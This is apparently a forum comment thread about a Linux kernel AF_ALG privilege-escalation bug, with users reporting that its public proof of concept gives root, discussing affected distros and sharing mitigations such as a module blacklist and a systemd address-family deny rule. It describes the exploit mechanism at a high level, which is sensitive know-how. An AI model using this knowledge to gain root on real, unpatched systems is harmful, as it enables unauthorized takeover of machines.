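# Hypothetical demo blob: compress a minimal fake ELF-magic header.
demo = binascii.hexlify(zlib.compress(b"\x7fELF" + b"\x00" * 60)).decode()
print(classify_blob(demo))  # ('ELF binary', 64)
```

On the real payload you would then hand `raw` to `objdump -d` or a disassembler rather than executing anything.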
I checked it. Very nice effort went into creating it.
On the downside, I need to push new kernels to all my servers.<p>On the bright side, does this mean Magisk is coming to all unpatched Android phones?
s6-overlay is a popular container image base for many self hosted services, and it uses an suid binary for startup. I wonder if this could be used to escape the container?
So this could be usable in a lot of places with Python and Linux running? Not that I have too many Linux devices around. Still, it might be handy sometimes on personal devices.
This can likely be shipped as binary code without dependencies like python, as the bug is in the kernel.
There's nothing Python-specific about this; that just demonstrates how it works.<p>This is usable anywhere on an affected kernel version.
Works on all my servers. This is terrifying.
Wow. I tried it on an old testing VM of Ubuntu 24.04 that had not been touched for a few months. Instant root with the bonus that any user that runs "su" gets root too.
I updated the VM thinking it would be fixed afterward. Nope.
Can we just make a one-pager instead of this nonsense LLM bullet-pointed list that explains the issue to your pointy-haired CEO instead of to sysadmins who would understand the badness in 3 lines? Yeesh
Fun day for people running bare metal GPU nodes, where teams have been training models for months, and now it must be abruptly aborted to apply security patches... is that something that can be resumed, or do they have to restart from scratch?
As usual, Qubes is not vulnerable, since by its design, any untrusted software runs in dedicated VMs with hardware virtualization.<p>Meanwhile, recent Xen CVEs also do not affect Qubes, as usual, <a href="https://www.qubes-os.org/news/2026/04/28/xsas-released-on-2026-04-28/" rel="nofollow">https://www.qubes-os.org/news/2026/04/28/xsas-released-on-20...</a>
You know that Xen is just a hypervisor, right? Dom0 (the admin qube) runs the Linux kernel and is vulnerable like any other Linux system. DomU (app qubes) also run the Linux kernel and are just as vulnerable.<p>You can check your DomU kernels using this guide:<p><a href="https://doc.qubes-os.org/en/latest/user/advanced-topics/managing-vm-kernels.html" rel="nofollow">https://doc.qubes-os.org/en/latest/user/advanced-topics/mana...</a><p>If your Dom0 or DomU is running a kernel < 6.18.22, or between 6.19.0 and 6.19.12, you are vulnerable.<p><a href="https://github.com/QubesOS/qubes-linux-kernel/pull/1272" rel="nofollow">https://github.com/QubesOS/qubes-linux-kernel/pull/1272</a> commit fafe0fa2995a of the kernel mirror<p>The currently stable version of Qubes OS does not have the patched kernels. <a href="https://yum.qubes-os.org/r4.3/current/dom0/fc41/rpm/" rel="nofollow">https://yum.qubes-os.org/r4.3/current/dom0/fc41/rpm/</a>
> Dom0 (the admin Qube) is running the Linux kernel and is vulnerable<p>Yes, it is vulnerable, except there is no attack vector, as you don't run any software there: <a href="https://doc.qubes-os.org/en/r4.3/user/downloading-installing-upgrading/supported-releases.html#note-on-dom0-and-eol" rel="nofollow">https://doc.qubes-os.org/en/r4.3/user/downloading-installing...</a><p>> DomU (App Qubes) also run the Linux kernel and are just as vulnerable.<p>I think you misinterpret the Qubes approach to security. If you do everything in one VM, you get no protection from the virtualization. Moreover, there is no sudo password by design: <a href="https://doc.qubes-os.org/en/r4.3/user/security-in-qubes/vm-sudo.html" rel="nofollow">https://doc.qubes-os.org/en/r4.3/user/security-in-qubes/vm-s...</a> This is not how to use Qubes.<p>You need to compartmentalize your workflows. It doesn't matter if my disposable VM is compromised. My secrets are in another, offline VM, where I never run anything. There is no way to use the discussed vulnerability, if one uses Qubes according to docs. See examples here: <a href="https://doc.qubes-os.org/en/latest/user/how-to-guides/how-to-organize-your-qubes.html" rel="nofollow">https://doc.qubes-os.org/en/latest/user/how-to-guides/how-to...</a>
I tried this on NixOS, but it doesn't seem to be easily reproducible. There's no /usr/bin/su - okay, fine: I changed it to /run/wrappers/bin/su, but that didn't work, and I <i>think</i> the reason why is because the NixOS suid wrappers have +x but not +r:<p><pre><code> $ ls -lah /run/wrappers/bin/su
-r-s--x--x 1 root root 70K Apr 27 11:09 /run/wrappers/bin/su
</code></pre>
Not that this makes the underlying mechanism of the exploit any better, but I wonder what else you can do with it. Is there a way to target a suid binary that doesn't have +r? I guess none of the suid binaries here have it, since the wrapper system doesn't grant it and you can't have suid binaries in the /nix/store.<p>I know it's also unrelated, but this is the most aggressively obvious LLM slop copy I've ever seen, and it is a page with like 30 sentences. I guess we're just seriously doing this, huh?
It's the same with Gentoo, setuid binaries are installed without read permission.<p>But modifying a setuid binary is just the demo exploit that was published with the vulnerability disclosure. The vulnerability actually allows modifying four bytes in any readable file. That means system configuration files, other binaries intended to be run by root, libraries... It's not limited to modifying setuid binaries.
Are kernel crypto modules even loaded by default on enterprise distros?
I love how it says
"Standalone PoC. Python 3.10+ stdlib only (os, socket, zlib).
Targets /usr/bin/su by default; pass another setuid binary as argv[1]."<p>Except you can't pass another setuid binary as argv[1], because the AI writing this slop never added that feature to the Python script.<p>I can't get it to work on any distro I've tried.
> Will you release the full PoC?<p>> Yes — it's on this page. We held it for a month while distros prepared patches; the major builds are out as of this writing.<p>There is no update available for Ubuntu 24; the PoC still works and I just tried updating.
RHEL is listing this as fix deferred for RHEL 8 and 9.
I tried this exploit on Android, and it looks like you need root in the first place to create an AF_ALG socket. I guess there's an SELinux policy disabling AF_ALG entirely.
Despite the copy/images being weird about RHEL 14.3, this seems to work. Wow?
SUID binaries once again assisted a local privilege escalation attack. This is a major problem that distros can't keep ignoring.
Use extreme caution running arbitrary code on your machines, especially obfuscated code that tickles kernel bugs!
Analysis of the PoC agrees with my tests, which confirm that the portion of `su` that gets overwritten does not survive a reboot.
The page explicitly describes it as stealthy because it makes no permanent changes, only corrupting the binary in memory.
> If your kernel was built between 2017 and the patch<p>This is why I compile my own kernel. I disable things I don't use. If it's not present it can't hurt you.<p>> block AF_ALG socket creation via seccomp regardless of patch state.<p>Likewise I use seccomp to only allow syscalls that are necessary. Everything else is disabled. In the programs I have that need to connect to a backend socket, that is done, and then socket creation is disabled.
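For services under systemd, there is a lower-effort way to get the seccomp blocking described above: an address-family deny-list in a drop-in file, which systemd enforces with a seccomp filter. A sketch (the unit and file names here are hypothetical):

```ini
# /etc/systemd/system/yourservice.service.d/no-af-alg.conf
[Service]
# Deny-list just AF_ALG for this service...
RestrictAddressFamilies=~AF_ALG
# ...or, stricter, allow-list only the families the service actually needs:
# RestrictAddressFamilies=AF_UNIX AF_INET AF_INET6
```

Then `systemctl daemon-reload && systemctl restart yourservice`. This only covers that service, not arbitrary user sessions, so it complements rather than replaces a kernel update.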
Any pointers on how to set that up? Like, run everything through strace, cut the first field, sort, uniq, and feed it through some template or somesuch?
You can tell security has become complete theatre when people are registering domains and setting up a whole fucking website for individual ones.
Is this fixed in any stable release kernel yet?
Does anyone have a workaround for it?<p>Edit: I don't understand why this comment would be downvoted.
I used, for debian based systems:<p><pre><code> printf "# CVE-2026-31431\nblacklist algif_aead\ninstall algif_aead /bin/false\n" | sudo tee /etc/modprobe.d/blacklist-algif_aead.conf >/dev/null && sudo update-initramfs -u</code></pre>
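After applying that (and rebooting, or `modprobe -r algif_aead` if nothing holds the module), a quick probe can confirm the aead interface is gone. A sketch; it returns False on non-Linux systems or wherever AF_ALG is blocked, and `gcm(aes)` is just a generic aead algorithm name, not the specific template from this CVE:

```python
import socket

def aead_via_af_alg_available(name="gcm(aes)"):
    """True if an unprivileged AF_ALG aead socket can be bound."""
    try:
        s = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET)
    except (AttributeError, OSError):
        return False  # no AF_ALG constant (non-Linux) or socket() blocked
    try:
        s.bind(("aead", name))
        return True
    except OSError:
        return False  # algorithm type unavailable, e.g. algif_aead blacklisted
    finally:
        s.close()

print(aead_via_af_alg_available())
```

If this still prints True after the blacklist, something (an initramfs that wasn't rebuilt, a still-loaded module) is keeping the interface alive.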
There's some workarounds in <a href="https://copy.fail/#mitigation" rel="nofollow">https://copy.fail/#mitigation</a>
It does not behave as described on EndeavourOS (Arch-based) running kernel 6.19.14-arch1-1. I get the error:<p>Password: su: Authentication token manipulation error<p>I'm guessing this means it's already patched?
yes, it was reported on march 23rd, patched on april 1.<p>you are reading about it now <i>because</i> it has been patched.
same result on my arch machine as well.
I'm surprised that such a serious problem popped up out of nowhere.<p>In my opinion, this mostly affects countries still running outdated systems, especially for critical infrastructure.<p>This gives bad actors a direct route to root. Root being this easy to get is not funny.
Yet some people will still say that "AI" isn't ready to replace (or strongly assist) our workflows. Some of the best human devs left a vulnerability this serious <i>(it's extremely serious: so many container-as-a-service setups are vulnerable)</i> in place for 9 years, and an agent found it in 1 hour. Maybe it's time to wake up and accept that it's UNSAFE to not use AI for security review as well?